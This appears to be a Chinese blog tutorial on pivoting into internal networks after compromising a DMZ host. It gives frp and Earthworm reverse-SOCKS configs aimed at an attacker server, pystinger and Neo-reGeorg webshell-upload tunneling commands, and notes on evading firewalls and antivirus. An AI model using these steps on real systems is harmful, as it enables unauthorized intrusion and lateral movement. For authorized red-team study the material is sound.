内网渗透-(端口复用和隧道建立)

本文介绍了如何利用frp、Earthworm和Neo-reGeorg等工具进行内网穿透,以及端口复用技术的应用。重点讲解了frp的配置和使用,强调其作为稳定高效的内网穿透工具。同时提到了Earthworm的局限性和速度问题,以及Neo-reGeorg的webshell建立 socks5代理的方法。此外,还探讨了在特定环境下的端口复用策略,如80端口出网的场景。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言:

首先对于出网与不出网的区别很多人不理解,内网不出网到底是ping不通百度还是ping不通同一网段的机器。

其实大部分内网不出网都是ping不通百度,不能去外网,ping不通同一网段要不是配置错误,要不就是防火墙问题,还有就是不能ping通同一网段的机器上线价值不大,以下我们讨论的不出网都是不能ping通百度的。

对于有双网卡的机器,既可以出外网又和内网机器相同我们称这个机器为(DMZ区机器),也就是win7机器,一般也是我们的跳板机。

对于这种我们可以直接拿下dmz区域的机器,利用dmz机器跳板进入内网。

1.frp搭建

首先我们明确知道,win7可以访问内网机器,还可以访问外网,我们就可以通过建立与win7的连接,利用win7的端口去访问内网机器,然后进击内网!

这是frp的配置文件,有win版本也有linux版本,还有mac版本,linux启动方式就是 ./frps -c frps.ini ,类似的系统对应启动方式也差不多,详情可以看官方方法,这里不赘述。下载地址

1.首先kali搭建frps服务端(kali也可以是vps)

frps.ini

[common]
bind_addr=192.168.175.145 #kali的ip也可以是vps的ip
bind_port=7000
allow_ports=1000-2000

2.win7的配置,也就是dmz配置

frpc.ini

[common]
server_addr=192.168.31.120
server_port=7000

[socks5]
type=tcp
plugin=socks5
remote_port=1080

这里是建立socks5的隧道,这个速度非常块。

然后利用proxychains工具和proxifier的全局代理socks5就可以进击内网了。

2.Earthworm(ew)穿透内网

1.kali执行

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

2.win7的dmz执行

./ew_for_win64.exe -s rssocks -d 192.168.175.145 -e 1234

然后利用proxychains工具和proxifier的全局代理socks5就可以进击内网了。

缺点:ew是非常老的工具了,真实环境一上线就会被杀软秒杀,而且速度没有frp快。

二:不出网的隧道和端口复用

首先看以下拓补图

在这里插入图片描述
1.可以建立正向的http隧道

利用cs的上线虚拟机,然后上线不出网的服务器。但是配置复杂而且是正向连接,容易被防火墙拦截,我就不写出了。

2.利用毒刺

毒刺(pystinger)通过Webshell实现内⽹Socks4代理,端⼝映射,可直接⽤于metasploit- framework,cobalt strike上线。主体使⽤python开发,当前⽀持php、jsp(x)、aspx三种代理脚本。

项⽬地址:https://github.com/FunnyWolf/pystinger

首先内网需要有web的环境,而且需要支持php,jsp,aspx的脚本运行,限制也挺大的。

1.⾸先,将对应的脚本⽂件上传到⽬标⽹站⽬录,访问成功返回 UTF-8。

在这里插入图片描述

2.上传stinger_server.exe 到目标服务器,并start命令运行该程序

start stinger_server.exe

3.kali运行客户端(vps也行)

./stinger_client -w http://example.com/proxy.jsp -l 0.0.0.0 -p 60000

然后会在60000端口开启socks隧道,只要配置proxychains就可以了

3.Neo-reGeorg(socks5)

1.设置密码,生成tunnel的webshell,并上传到目标服务器。

python neoreg.py generate -k 自定义密码

2.使用neoreg.py连接webshell,并在本地建立socks代理

python neoreg.py -k 密码 -u http://example.xx/tunnel.*(php/jsp/asp) -p 自定义端口

## 4.端口复用技术
利用场景,就是机器只支持80端口出网而且还不能配置防火墙,巧妙使用可以过防火墙,就是80端口可能流量太多,不稳定。

这里贴个使用连接,传送门

3.总结

frp是目前比较好的内网穿透工具,而且不断跟新,也是跨平台的,支持多种协议,大家一定要牢记frp的使用。

1、Earthworm不能过杀软!被秒杀…

2、Tunnel非常不稳定,web都动不动崩溃,更别说支持3389了…(Neo-reGeorg)

3、ptunnel该环境在内网多限制情况才可利用,局限性,ptunnel是一款建立ICMP隧道传输数据的工具。
适用条件:防火墙只允许ping出站流量,利用ptunnel建立ICMP隧道,从而实现传输数据。)

4、DNS 隧道穿透,适合僵尸网络…太慢了…流量走得太慢,测试我都浪费很多时间…

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值